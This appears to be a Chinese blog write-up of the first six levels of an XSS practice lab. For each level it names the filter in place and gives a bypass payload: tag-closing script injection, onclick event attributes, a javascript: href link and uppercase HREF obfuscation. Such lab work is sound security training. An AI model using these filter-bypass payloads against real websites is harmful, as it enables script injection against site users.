1.
这是重写了alert()函数嘛,所以才会弹出完成的不错。
2。![](https://img-blog.csdnimg.cn/062e530a122d4d5598f4cc6b25520dc5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54uC5bCP5YWU,size_20,color_FFFFFF,t_70,g_se,x_16)
我们的输入实在表单中,这样我们需要进行闭合。
"><script>alert(1)</script>
3.![](https://img-blog.csdnimg.cn/caf8a17bc48c40979c98e71e8e6d65e1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54uC5bCP5YWU,size_20,color_FFFFFF,t_70,g_se,x_16)
失败了,这里应该是把<>进行了转义。查看源代码可知 使用了htmlspecialchars进行过滤。
'οnclick='alert(11)使用事件,绕过转义。
4.
一样是把<进行了过滤,那么我们还是使用事件"οnclick="alert(1)
5.![](https://img-blog.csdnimg.cn/c5e0c00aed524a4491aa11e1e30fb200.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54uC5bCP5YWU,size_20,color_FFFFFF,t_70,g_se,x_16)
将script重写为scr_ipt。还用事件试试。o_nclick把on也过滤了。
构造"> <a href=javascript:alert('1') > 1</a>。当点击1的时候触发弹窗。
6.![](https://img-blog.csdnimg.cn/b255f93de73846a2b5df997776a0531e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54uC5bCP5YWU,size_20,color_FFFFFF,t_70,g_se,x_16)
上一关的方法不能用了,
"> <a HREF=javascript:alert('1') > 1</a> 将href大写进行混淆。